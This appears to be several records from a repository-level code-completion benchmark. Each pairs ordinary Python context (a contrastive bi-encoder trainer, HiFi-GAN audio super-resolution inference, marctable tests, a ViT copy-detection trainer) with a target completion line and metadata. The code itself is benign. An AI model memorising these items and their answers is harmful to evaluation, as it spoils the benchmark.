def get_env_var(env_var, type_cls, default_val):
if env_var in os.environ:
return type_cls(os.environ[env_var])
return default_val
MODEL_CLS = {
"VisionT5SimpleBiEncoder": {
"model_cls": VisionT5SimpleBiEncoder,
},
"VisionT5MeanBiEncoder": {
"model_cls": VisionT5MeanBiEncoder,
},
"VisionT5SimpleBiEncoderHN": {
"model_cls": VisionT5SimpleBiEncoderHN,
},
"VisionT5MeanBiEncoderHN": {
| # Copyright 2022 san kim
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
logger = logging.getLogger(__name__)
def broadcast(tensors, rank=0):
rt = tensors.clone().detach()
torch.distributed.broadcast(rt, rank)
return rt
def reduce_tensor(tensor, args):
rt = tensor.clone().detach()
dist.all_reduce(rt, op=dist.ReduceOp.SUM)
rt /= args.world_size
return rt
def reduce_sum_tensor(tensor):
rt = tensor.clone().detach()
dist.all_reduce(rt, op=dist.ReduceOp.SUM)
return rt
def all_gather(tensors, args, **kwargs):
rt = tensors.clone().detach()
tensor_list = [torch.zeros_like(rt) for _ in range(args.world_size)]
torch.distributed.all_gather(tensor_list, rt)
return tensor_list
def compute_loss(model, batch, loss_fn, args):
outputs = model(batch)
# outputs: language_repr, vision_repr- [batch_size, model_dim]
batch_size = outputs["language_repr"].size(0)
scores = torch.mm(outputs["language_repr"], outputs["vision_repr"].t())
# scores(diagonal): [batch_size, batch_size]
target = torch.arange(batch_size).to(outputs["language_repr"].device)
retrieve_loss = loss_fn(scores/args.logit_temperature, target) + loss_fn(scores.t()/args.logit_temperature, target)
return retrieve_loss
def compute_loss_over_device(model, batch, loss_fn, args):
outputs = model(batch)
# outputs: language_repr, vision_repr- [batch_size, model_dim]
language_repr = outputs["language_repr"]
vision_repr = outputs["vision_repr"]
batch_size = language_repr.size(0)
# blocking call (all_gather)
with torch.no_grad():
language_repr_gathered = all_gather(language_repr, args)
vision_repr_gathered = all_gather(vision_repr, args)
# language_repr_gathered, vision_repr_gathered - [world_size, batch_size, model_dim]
language_repr_gathered[args.rank] = language_repr
vision_repr_gathered[args.rank] = vision_repr
language_repr_cat = torch.cat(language_repr_gathered, dim=0)
vision_repr_cat = torch.cat(vision_repr_gathered, dim=0)
# language_repr_cat, vision_repr_cat - [batch_size*world_size, model_dim]
scores = torch.mm(language_repr_cat, vision_repr_cat.t())
target = torch.arange(batch_size * args.world_size).to(language_repr.device)
retrieve_loss = loss_fn(scores, target)
return retrieve_loss
def retrieval_eval(model, batch):
outputs = model(batch)
# outputs: language_repr, vision_repr- [batch_size, model_dim]
batch_size = outputs["language_repr"].size(0)
scores = torch.mm(outputs["language_repr"], outputs["vision_repr"].t())
target = torch.arange(batch_size).to(outputs["language_repr"].device)
# scores: [batch_size, batch_size]
ranked = scores.argsort(dim=1, descending=True)
# [[0.1, 0.3, -0.2, 0.14 ]] -> [[1, 3, 0, 2]] (index of score - descending order)
idx2ranked_t = ranked.argsort(dim=1)
# [[1, 3, 0, 2]] -> [[2, 0, 3, 1]] (index to rank)
rrs = []
for t, idx2ranked in zip(target, idx2ranked_t):
rrs.append(1 / (idx2ranked[t].item() + 1))
# reciprocal rank for 1st, 2nd hop
return {
"mrr": torch.tensor(np.mean(rrs)).to(outputs["language_repr"].device)
}
def create_dir_if_not_exist(path):
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
def create_directory_info(args, create_dir=True):
model_dir = os.path.join(args.output_dir, "{}-{}-{}".format(
args.model_cls.replace('/', '_'),
args.vision_model.replace('/', '_'),
args.language_model.replace('/', '_')))
if args.dir_suffix is not None:
model_dir = '_'.join([model_dir, args.dir_suffix])
weights_dir = os.path.join(model_dir, "weights")
logs_dir = os.path.join(model_dir, "logs")
path_info = {
'model_dir': model_dir,
'weights_dir': weights_dir,
'logs_dir': logs_dir,
}
if create_dir:
for k, v in path_info.items():
create_dir_if_not_exist(v)
path_info['best_model_path'] = os.path.join(weights_dir, "best_model.pth")
path_info['ckpt_path'] = os.path.join(weights_dir, "checkpoint.pth")
return path_info
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def save_checkpoint(state, is_best, filename='checkpoint.pth', best_filename='model_best.pth'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, best_filename)
def get_env_var(env_var, type_cls, default_val):
if env_var in os.environ:
return type_cls(os.environ[env_var])
return default_val
MODEL_CLS = {
"VisionT5SimpleBiEncoder": {
"model_cls": VisionT5SimpleBiEncoder,
},
"VisionT5MeanBiEncoder": {
"model_cls": VisionT5MeanBiEncoder,
},
"VisionT5SimpleBiEncoderHN": {
"model_cls": VisionT5SimpleBiEncoderHN,
},
"VisionT5MeanBiEncoderHN": { | "model_cls": VisionT5MeanBiEncoderHN, | 4 | 2023-12-18 10:37:51+00:00 | 4k |
liuhuang31/hifigan-sr | inference.py | [
{
"identifier": "AttrDict",
"path": "env.py",
"snippet": "class AttrDict(dict):\n def __init__(self, *args, **kwargs):\n super(AttrDict, self).__init__(*args, **kwargs)\n self.__dict__ = self"
},
{
"identifier": "mel_spectrogram",
"path": "meldataset.py",
"snippet": "def mel_spectrogram(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False, training=False):\n # if torch.min(y) < -1.:\n # print('min value is ', torch.min(y))\n # if torch.max(y) > 1.:\n # print('max value is ', torch.max(y))\n if training:\n with torch.no_grad():\n # 16k to 24k/48k\n if fmax <= 8000 and (sampling_rate == 24000 or sampling_rate == 48000):\n y = y.squeeze().cpu().numpy()\n y = librosa.resample(y, sampling_rate, 16000)\n y = librosa.resample(y, 16000, 24000)\n y = torch.FloatTensor(y)\n y = y.unsqueeze(0)\n sampling_rate = 24000\n n_fft = int(n_fft/2)\n hop_size=int(hop_size/2)\n win_size=int(win_size/2)\n # 24k to 48k\n elif fmax <= 12000 and sampling_rate == 48000:\n y = y.squeeze().cpu().numpy()\n y = librosa.resample(y, sampling_rate, 24000)\n y = torch.FloatTensor(y)\n y = y.unsqueeze(0)\n sampling_rate = 24000\n n_fft = int(n_fft/2)\n hop_size=int(hop_size/2)\n win_size=int(win_size/2)\n else:\n pass\n\n global mel_basis, hann_window\n if fmax not in mel_basis:\n mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax)\n mel_basis[str(fmax)+'_'+str(y.device)] = torch.from_numpy(mel).float().to(y.device)\n hann_window[str(y.device)] = torch.hann_window(win_size).to(y.device)\n\n y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect')\n y = y.squeeze(1)\n\n spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[str(y.device)],\n center=center, pad_mode='reflect', normalized=False, onesided=True)\n\n spec = torch.sqrt(spec.pow(2).sum(-1)+(1e-9))\n\n spec = torch.matmul(mel_basis[str(fmax)+'_'+str(y.device)], spec)\n spec = spectral_normalize_torch(spec)\n\n return spec"
},
{
"identifier": "MAX_WAV_VALUE",
"path": "meldataset.py",
"snippet": "MAX_WAV_VALUE = 32768.0"
},
{
"identifier": "load_wav",
"path": "meldataset.py",
"snippet": "def load_wav(full_path, sr):\n # sampling_rate, data = read(full_path)\n data, sampling_rate = librosa.load(full_path, mono=True, sr=sr)\n return data, sampling_rate"
},
{
"identifier": "Generator",
"path": "models.py",
"snippet": "class Generator(torch.nn.Module):\n def __init__(self, h):\n super(Generator, self).__init__()\n self.h = h\n self.num_kernels = len(h.resblock_kernel_sizes)\n self.num_upsamples = len(h.upsample_rates)\n self.conv_pre = weight_norm(Conv1d(80, h.upsample_initial_channel, 7, 1, padding=3))\n resblock = ResBlock1 if h.resblock == '1' else ResBlock2\n\n self.ups = nn.ModuleList()\n for i, (u, k) in enumerate(zip(h.upsample_rates, h.upsample_kernel_sizes)):\n self.ups.append(weight_norm(\n ConvTranspose1d(h.upsample_initial_channel//(2**i), h.upsample_initial_channel//(2**(i+1)),\n k, u, padding=(k-u)//2)))\n\n self.resblocks = nn.ModuleList()\n for i in range(len(self.ups)):\n ch = h.upsample_initial_channel//(2**(i+1))\n for j, (k, d) in enumerate(zip(h.resblock_kernel_sizes, h.resblock_dilation_sizes)):\n self.resblocks.append(resblock(h, ch, k, d))\n\n self.conv_post = weight_norm(Conv1d(ch, 1, 7, 1, padding=3))\n self.ups.apply(init_weights)\n self.conv_post.apply(init_weights)\n\n def forward(self, x):\n x = self.conv_pre(x)\n for i in range(self.num_upsamples):\n x = F.leaky_relu(x, LRELU_SLOPE)\n x = self.ups[i](x)\n xs = None\n for j in range(self.num_kernels):\n if xs is None:\n xs = self.resblocks[i*self.num_kernels+j](x)\n else:\n xs += self.resblocks[i*self.num_kernels+j](x)\n x = xs / self.num_kernels\n x = F.leaky_relu(x)\n x = self.conv_post(x)\n x = torch.tanh(x)\n\n return x\n\n def remove_weight_norm(self):\n print('Removing weight norm...')\n for l in self.ups:\n remove_weight_norm(l)\n for l in self.resblocks:\n l.remove_weight_norm()\n remove_weight_norm(self.conv_pre)\n remove_weight_norm(self.conv_post)"
}
] | import glob
import os
import librosa
import argparse
import json
import torch
from scipy.io.wavfile import write
from env import AttrDict
from meldataset import mel_spectrogram, MAX_WAV_VALUE, load_wav
from models import Generator | 1,985 | from __future__ import absolute_import, division, print_function, unicode_literals
h = None
device = None
def load_checkpoint(filepath, device):
assert os.path.isfile(filepath)
print("Loading '{}'".format(filepath))
checkpoint_dict = torch.load(filepath, map_location=device)
print("Complete.")
return checkpoint_dict
def get_mel(x):
return mel_spectrogram(x, h.n_fft, h.num_mels, h.sampling_rate, h.hop_size, h.win_size, h.fmin, h.fmax)
def get_mel_24k(x):
return mel_spectrogram(x, 1024, h.num_mels, 24000, 240, 1024, h.fmin, 8000)
def scan_checkpoint(cp_dir, prefix):
pattern = os.path.join(cp_dir, prefix + '*')
cp_list = glob.glob(pattern)
if len(cp_list) == 0:
return ''
return sorted(cp_list)[-1]
def inference(a):
generator = Generator(h).to(device)
state_dict_g = load_checkpoint(a.checkpoint_file, device)
generator.load_state_dict(state_dict_g['generator'])
filelist = os.listdir(a.input_wavs_dir)
os.makedirs(a.output_dir, exist_ok=True)
generator.eval()
generator.remove_weight_norm()
with torch.no_grad():
for i, filname in enumerate(filelist):
# wav, sr = load_wav(os.path.join(a.input_wavs_dir, filname))
# wav = wav / MAX_WAV_VALUE
wav, _ = librosa.load(os.path.join(a.input_wavs_dir, filname), mono=True, sr=16000)
wav = librosa.resample(wav, 16000, 24000, fix=True, scale=False)
wav = torch.FloatTensor(wav).to(device)
x = get_mel_24k(wav.unsqueeze(0))
y_g_hat = generator(x)
audio = y_g_hat.squeeze()
audio = audio * MAX_WAV_VALUE
audio = audio.cpu().numpy().astype('int16')
output_file = os.path.join(a.output_dir, os.path.splitext(filname)[0] + '_generated.wav')
write(output_file, h.sampling_rate, audio)
print(output_file)
def main():
print('Initializing Inference Process..')
parser = argparse.ArgumentParser()
parser.add_argument('--input_wavs_dir', default='test_files')
parser.add_argument('--output_dir', default='generated_files')
parser.add_argument('--checkpoint_file', required=True)
a = parser.parse_args()
config_file = os.path.join(os.path.split(a.checkpoint_file)[0], 'config.json')
with open(config_file) as f:
data = f.read()
global h
json_config = json.loads(data)
| from __future__ import absolute_import, division, print_function, unicode_literals
h = None
device = None
def load_checkpoint(filepath, device):
assert os.path.isfile(filepath)
print("Loading '{}'".format(filepath))
checkpoint_dict = torch.load(filepath, map_location=device)
print("Complete.")
return checkpoint_dict
def get_mel(x):
return mel_spectrogram(x, h.n_fft, h.num_mels, h.sampling_rate, h.hop_size, h.win_size, h.fmin, h.fmax)
def get_mel_24k(x):
return mel_spectrogram(x, 1024, h.num_mels, 24000, 240, 1024, h.fmin, 8000)
def scan_checkpoint(cp_dir, prefix):
pattern = os.path.join(cp_dir, prefix + '*')
cp_list = glob.glob(pattern)
if len(cp_list) == 0:
return ''
return sorted(cp_list)[-1]
def inference(a):
generator = Generator(h).to(device)
state_dict_g = load_checkpoint(a.checkpoint_file, device)
generator.load_state_dict(state_dict_g['generator'])
filelist = os.listdir(a.input_wavs_dir)
os.makedirs(a.output_dir, exist_ok=True)
generator.eval()
generator.remove_weight_norm()
with torch.no_grad():
for i, filname in enumerate(filelist):
# wav, sr = load_wav(os.path.join(a.input_wavs_dir, filname))
# wav = wav / MAX_WAV_VALUE
wav, _ = librosa.load(os.path.join(a.input_wavs_dir, filname), mono=True, sr=16000)
wav = librosa.resample(wav, 16000, 24000, fix=True, scale=False)
wav = torch.FloatTensor(wav).to(device)
x = get_mel_24k(wav.unsqueeze(0))
y_g_hat = generator(x)
audio = y_g_hat.squeeze()
audio = audio * MAX_WAV_VALUE
audio = audio.cpu().numpy().astype('int16')
output_file = os.path.join(a.output_dir, os.path.splitext(filname)[0] + '_generated.wav')
write(output_file, h.sampling_rate, audio)
print(output_file)
def main():
print('Initializing Inference Process..')
parser = argparse.ArgumentParser()
parser.add_argument('--input_wavs_dir', default='test_files')
parser.add_argument('--output_dir', default='generated_files')
parser.add_argument('--checkpoint_file', required=True)
a = parser.parse_args()
config_file = os.path.join(os.path.split(a.checkpoint_file)[0], 'config.json')
with open(config_file) as f:
data = f.read()
global h
json_config = json.loads(data) | h = AttrDict(json_config) | 0 | 2023-12-16 01:21:00+00:00 | 4k |
edsu/marctable | test_marctable.py | [
{
"identifier": "MARC",
"path": "marctable/marc.py",
"snippet": "class MARC:\n def __init__(self) -> None:\n self.fields: List[Field] = []\n\n @cache\n def get_field(self, tag: str) -> Field:\n for field in self.fields:\n if field.tag == tag:\n return field\n raise SchemaFieldError(f\"{tag} is not a defined field tag in Avram schema\")\n\n @cache\n def get_subfield(self, tag: str, code: str) -> Subfield:\n field = self.get_field(tag)\n return field.get_subfield(code)\n\n @property\n def avram_file(self) -> pathlib.Path:\n return pathlib.Path(__file__).parent / \"marc.json\"\n\n @classmethod\n @cache\n def from_avram(cls: Type[\"MARC\"], avram_file: Optional[IO] = None) -> \"MARC\":\n marc = MARC()\n\n if avram_file is None:\n avram_file = marc.avram_file.open(\"r\")\n\n for d in json.load(avram_file)[\"fields\"].values():\n marc.fields.append(Field.from_dict(d))\n\n return marc\n\n def to_avram(self, avram_file: Optional[IO] = None) -> None:\n if avram_file is None:\n avram_file = self.avram_file.open(\"w\")\n\n d = {\n \"title\": \"MARC21 bibliographic format\",\n \"url\": \"https://www.loc.gov/marc/bibliographic/\",\n \"family\": \"marc\",\n \"language\": \"en\",\n \"fields\": {f.tag: f.to_dict() for f in self.fields},\n }\n json.dump(d, avram_file, indent=2)"
},
{
"identifier": "SchemaFieldError",
"path": "marctable/marc.py",
"snippet": "class SchemaFieldError(Exception):\n pass"
},
{
"identifier": "SchemaSubfieldError",
"path": "marctable/marc.py",
"snippet": "class SchemaSubfieldError(Exception):\n pass"
},
{
"identifier": "crawl",
"path": "marctable/marc.py",
"snippet": "def crawl(n: int = 0, quiet: bool = False, outfile: IO = sys.stdout) -> None:\n marc = MARC()\n for f in fields():\n marc.fields.append(f)\n if not quiet:\n print(f)\n if n != 0 and len(marc.fields) >= n:\n break\n marc.to_avram(outfile)"
},
{
"identifier": "_mapping",
"path": "marctable/utils.py",
"snippet": "def _mapping(rules: list) -> dict:\n \"\"\"\n unpack the mapping rules into a dictionary for easy lookup\n\n >>> _mapping([\"245\", \"260ac\"])\n {'245': None, '260': ['a', 'c']}\n \"\"\"\n marc = MARC.from_avram()\n if rules is None or len(rules) == 0:\n rules = [field.tag for field in marc.fields]\n\n m = {}\n for rule in rules:\n field_tag = rule[0:3]\n if marc.get_field(field_tag) is None:\n raise Exception(f\"unknown MARC field in mapping rule: {rule}\")\n\n subfields = set(list(rule[3:]))\n for subfield_code in subfields:\n if marc.get_subfield(field_tag, subfield_code) is None:\n raise Exception(f\"unknown MARC subfield in mapping rule: {rule}\")\n\n m[field_tag] = subfields or None\n\n return m"
},
{
"identifier": "dataframe_iter",
"path": "marctable/utils.py",
"snippet": "def dataframe_iter(\n marc_input: BinaryIO, rules: list = [], batch: int = 1000\n) -> Generator[DataFrame, None, None]:\n columns = _columns(_mapping(rules))\n for records_batch in records_iter(marc_input, rules, batch):\n yield DataFrame.from_records(records_batch, columns=columns)"
},
{
"identifier": "to_csv",
"path": "marctable/utils.py",
"snippet": "def to_csv(\n marc_input: BinaryIO,\n csv_output: TextIO,\n rules: list = [],\n batch: int = 1000,\n) -> None:\n \"\"\"\n Convert MARC to CSV.\n \"\"\"\n first_batch = True\n for df in dataframe_iter(marc_input, rules=rules, batch=batch):\n df.to_csv(csv_output, header=first_batch, index=False)\n first_batch = False"
},
{
"identifier": "to_dataframe",
"path": "marctable/utils.py",
"snippet": "def to_dataframe(marc_input: BinaryIO, rules: list = []) -> DataFrame:\n \"\"\"\n Return a single DataFrame for the entire dataset.\n \"\"\"\n return next(dataframe_iter(marc_input, rules, batch=0))"
},
{
"identifier": "to_parquet",
"path": "marctable/utils.py",
"snippet": "def to_parquet(\n marc_input: BinaryIO,\n parquet_output: IOBase,\n rules: list = [],\n batch: int = 1000,\n) -> None:\n \"\"\"\n Convert MARC to Parquet.\n \"\"\"\n schema = _make_parquet_schema(rules)\n writer = ParquetWriter(parquet_output, schema, compression=\"SNAPPY\")\n for records_batch in records_iter(marc_input, rules=rules, batch=batch):\n table = pyarrow.Table.from_pylist(records_batch, schema)\n writer.write_table(table)\n\n writer.close()"
}
] | import json
import pathlib
import pandas
from io import StringIO
from marctable.marc import MARC, SchemaFieldError, SchemaSubfieldError, crawl
from marctable.utils import _mapping, dataframe_iter, to_csv, to_dataframe, to_parquet
from pytest import raises | 2,512 | f015 = schema["fields"]["015"]
assert f015["label"] == "National Bibliography Number"
assert f015["url"] == "https://www.loc.gov/marc/bibliographic/bd015.html"
assert len(f015["subfields"]) == 6
# ensure that the Avram JSON for a subfield looks ok
assert f015["subfields"]["2"]
f0152 = f015["subfields"]["2"]
assert f0152["label"] == "Source"
assert f0152["code"] == "2"
assert f0152["repeatable"] is False
def test_marc() -> None:
assert len(marc.fields) == 215
def test_get_field() -> None:
assert marc.get_field("245")
with raises(SchemaFieldError, match="abc is not a defined field tag in Avram"):
marc.get_field("abc")
def test_get_subfield() -> None:
assert marc.get_subfield("245", "a").label == "Title"
with raises(SchemaSubfieldError, match="- is not a valid subfield in field 245"):
marc.get_subfield("245", "-") is None
def test_non_repeatable_field() -> None:
f245 = marc.get_field("245")
assert f245.tag == "245"
assert f245.label == "Title Statement"
assert f245.repeatable is False
def test_repeatable_field() -> None:
f650 = marc.get_field("650")
assert f650.tag == "650"
assert f650.label == "Subject Added Entry-Topical Term"
assert f650.repeatable is True
def test_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"))
assert len(df.columns) == 215
assert len(df) == 10612
assert df.iloc[0]["F008"] == "000110s2000 ohu f m eng "
# 245 is not repeatable
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
# 650 is repeatable
assert df.iloc[0]["F650"] == ["Leak detectors.", "Gas leakage."]
def test_custom_fields_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"), rules=["245", "650"])
assert len(df) == 10612
# should only have two columns in the dataframe
assert len(df.columns) == 2
assert df.columns[0] == "F245"
assert df.columns[1] == "F650"
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
assert df.iloc[0]["F650"] == ["Leak detectors.", "Gas leakage."]
def test_custom_subfields_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"), rules=["245a", "260c"])
assert len(df) == 10612
assert len(df.columns) == 2
assert df.columns[0] == "F245a"
assert df.columns[1] == "F260c"
# 245a is not repeatable
assert df.iloc[0]["F245a"] == "Leak testing CD-ROM"
# 260c is repeatable
assert df.iloc[0]["F260c"] == ["c2000."]
def test_field_mapping() -> None:
m = _mapping(["245", "650"])
assert m["245"] is None
assert m["650"] is None
def test_field_subfield_mapping() -> None:
m = _mapping(["245a", "650ax", "260"])
assert set(m["245"]) == set(["a"])
assert set(m["650"]) == set(["a", "x"])
assert m["260"] is None
def test_batch() -> None:
dfs = dataframe_iter(open("test-data/utf8.marc", "rb"), batch=1000)
df = next(dfs)
assert type(df), pandas.DataFrame
assert len(df) == 1000
def test_to_csv() -> None:
to_csv(
open("test-data/utf8.marc", "rb"), open("test-data/utf8.csv", "w"), batch=1000
)
df = pandas.read_csv("test-data/utf8.csv")
assert len(df) == 10612
assert len(df.columns) == 215
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
def test_to_parquet() -> None:
|
marc = MARC.from_avram()
def test_crawl() -> None:
# crawl the first 10 field definitions from the loc site (to save time)
outfile = StringIO()
crawl(10, quiet=True, outfile=outfile)
outfile.seek(0)
# ensure the Avram JSON parses and looks ok
schema = json.load(outfile)
assert schema
assert len(schema["fields"]) == 10
# ensure that the Avram JSON for a field looks ok
assert schema["fields"]["015"]
f015 = schema["fields"]["015"]
assert f015["label"] == "National Bibliography Number"
assert f015["url"] == "https://www.loc.gov/marc/bibliographic/bd015.html"
assert len(f015["subfields"]) == 6
# ensure that the Avram JSON for a subfield looks ok
assert f015["subfields"]["2"]
f0152 = f015["subfields"]["2"]
assert f0152["label"] == "Source"
assert f0152["code"] == "2"
assert f0152["repeatable"] is False
def test_marc() -> None:
assert len(marc.fields) == 215
def test_get_field() -> None:
assert marc.get_field("245")
with raises(SchemaFieldError, match="abc is not a defined field tag in Avram"):
marc.get_field("abc")
def test_get_subfield() -> None:
assert marc.get_subfield("245", "a").label == "Title"
with raises(SchemaSubfieldError, match="- is not a valid subfield in field 245"):
marc.get_subfield("245", "-") is None
def test_non_repeatable_field() -> None:
f245 = marc.get_field("245")
assert f245.tag == "245"
assert f245.label == "Title Statement"
assert f245.repeatable is False
def test_repeatable_field() -> None:
f650 = marc.get_field("650")
assert f650.tag == "650"
assert f650.label == "Subject Added Entry-Topical Term"
assert f650.repeatable is True
def test_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"))
assert len(df.columns) == 215
assert len(df) == 10612
assert df.iloc[0]["F008"] == "000110s2000 ohu f m eng "
# 245 is not repeatable
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
# 650 is repeatable
assert df.iloc[0]["F650"] == ["Leak detectors.", "Gas leakage."]
def test_custom_fields_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"), rules=["245", "650"])
assert len(df) == 10612
# should only have two columns in the dataframe
assert len(df.columns) == 2
assert df.columns[0] == "F245"
assert df.columns[1] == "F650"
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
assert df.iloc[0]["F650"] == ["Leak detectors.", "Gas leakage."]
def test_custom_subfields_df() -> None:
df = to_dataframe(open("test-data/utf8.marc", "rb"), rules=["245a", "260c"])
assert len(df) == 10612
assert len(df.columns) == 2
assert df.columns[0] == "F245a"
assert df.columns[1] == "F260c"
# 245a is not repeatable
assert df.iloc[0]["F245a"] == "Leak testing CD-ROM"
# 260c is repeatable
assert df.iloc[0]["F260c"] == ["c2000."]
def test_field_mapping() -> None:
m = _mapping(["245", "650"])
assert m["245"] is None
assert m["650"] is None
def test_field_subfield_mapping() -> None:
m = _mapping(["245a", "650ax", "260"])
assert set(m["245"]) == set(["a"])
assert set(m["650"]) == set(["a", "x"])
assert m["260"] is None
def test_batch() -> None:
dfs = dataframe_iter(open("test-data/utf8.marc", "rb"), batch=1000)
df = next(dfs)
assert type(df), pandas.DataFrame
assert len(df) == 1000
def test_to_csv() -> None:
to_csv(
open("test-data/utf8.marc", "rb"), open("test-data/utf8.csv", "w"), batch=1000
)
df = pandas.read_csv("test-data/utf8.csv")
assert len(df) == 10612
assert len(df.columns) == 215
assert (
df.iloc[0]["F245"]
== "Leak testing CD-ROM [computer file] / technical editors, Charles N. "
"Jackson, Jr., Charles N. Sherlock ; editor, Patrick O. Moore."
)
def test_to_parquet() -> None: | to_parquet( | 8 | 2023-12-21 21:14:29+00:00 | 4k |
WangWenhao0716/ViT4ICD | Stage_23/dg/trainers_cos_ema_feat_tune.py | [
{
"identifier": "accuracy",
"path": "Stage_23/dg/evaluation_metrics/classification.py",
"snippet": "def accuracy(output, target, topk=(1,)):\n with torch.no_grad():\n output, target = to_torch(output), to_torch(target)\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n ret = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(dim=0, keepdim=True)\n ret.append(correct_k.mul_(1. / batch_size))\n return ret"
},
{
"identifier": "CrossEntropyLabelSmooth",
"path": "Stage_23/dg/loss/crossentropy.py",
"snippet": "class CrossEntropyLabelSmooth(nn.Module):\n \"\"\"Cross entropy loss with label smoothing regularizer.\n\n Reference:\n Szegedy et al. Rethinking the Inception Architecture for Computer Vision. CVPR 2016.\n Equation: y = (1 - epsilon) * y + epsilon / K.\n\n Args:\n num_classes (int): number of classes.\n epsilon (float): weight.\n \"\"\"\n\n def __init__(self, num_classes, epsilon=0.1):\n super(CrossEntropyLabelSmooth, self).__init__()\n self.num_classes = num_classes\n self.epsilon = epsilon\n self.logsoftmax = nn.LogSoftmax(dim=1).cuda()\n\n def forward(self, inputs, targets):\n \"\"\"\n Args:\n inputs: prediction matrix (before softmax) with shape (batch_size, num_classes)\n targets: ground truth labels with shape (num_classes)\n \"\"\"\n log_probs = self.logsoftmax(inputs)\n targets = torch.zeros_like(log_probs).scatter_(1, targets.unsqueeze(1), 1)\n targets = (1 - self.epsilon) * targets + self.epsilon / self.num_classes\n loss = (- targets * log_probs).mean(0).sum()\n return loss"
},
{
"identifier": "AverageMeter",
"path": "Stage_23/dg/utils/meters.py",
"snippet": "class AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count"
},
{
"identifier": "MarginCosineProduct",
"path": "Stage_23/dg/layer.py",
"snippet": "class MarginCosineProduct(nn.Module):\n r\"\"\"Implement of large margin cosine distance: :\n Args:\n in_features: size of each input sample\n out_features: size of each output sample\n s: norm of input feature\n m: margin\n \"\"\"\n\n def __init__(self, in_features, out_features, s=30.0, m=0.40):\n super(MarginCosineProduct, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.s = s\n self.m = m\n self.weight = Parameter(torch.Tensor(out_features, in_features))\n nn.init.xavier_uniform_(self.weight)\n #stdv = 1. / math.sqrt(self.weight.size(1))\n #self.weight.data.uniform_(-stdv, stdv)\n\n def forward(self, input, label):\n cosine = cosine_sim(input, self.weight)\n # cosine = F.linear(F.normalize(input), F.normalize(self.weight))\n # --------------------------- convert label to one-hot ---------------------------\n # https://discuss.pytorch.org/t/convert-int-into-one-hot-format/507\n one_hot = torch.zeros_like(cosine)\n one_hot.scatter_(1, label.view(-1, 1), 1.0)\n # -------------torch.where(out_i = {x_i if condition_i else y_i) -------------\n output = self.s * (cosine - one_hot * self.m)\n\n return output\n\n def __repr__(self):\n return self.__class__.__name__ + '(' \\\n + 'in_features=' + str(self.in_features) \\\n + ', out_features=' + str(self.out_features) \\\n + ', s=' + str(self.s) \\\n + ', m=' + str(self.m) + ')'"
}
] | import time
import torch
import torch.nn as nn
import numpy as np
from torch.nn import functional as F
from .evaluation_metrics import accuracy
from .loss import CrossEntropyLabelSmooth#, CosfacePairwiseLoss
from .utils.meters import AverageMeter
from .layer import MarginCosineProduct | 2,228 | from __future__ import print_function, absolute_import
class Trainer(object):
def __init__(self, model, name_feature_support, num_classes, margin=0.0):
super(Trainer, self).__init__()
self.model = model
self.name_support = np.array(name_feature_support[0])
self.pos = np.argsort(self.name_support)
self.feat_support = name_feature_support[1]
self.criterion_ce = CrossEntropyLabelSmooth(num_classes, epsilon=0).cuda()
self.criterion_ce_1 = CrossEntropyLabelSmooth(num_classes, epsilon=0).cuda()
#self.criterion_support = nn.MSELoss().cuda()#nn.L1Loss().cuda() #nn.MSELoss().cuda()
#self.criterion_cos_pair = CosfacePairwiseLoss(m=0.35, s=64).cuda()
#self.criterion_triple = SoftTripletLoss(margin=margin).cuda()
#self.w_ce = 10
#self.w_tri = 1
#print("The weight for loss_ce is ", self.w_ce)
#print("The weight for loss_tri is ", self.w_tri)
def train(self, epoch, data_loader, data_loader_support, optimizer, ema, train_iters=200, print_freq=1):
self.model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
losses_ce = AverageMeter()
losses_ce_1 = AverageMeter()
losses_sp = AverageMeter()
#losses_cos_pair = AverageMeter()
#losses_tr = AverageMeter()
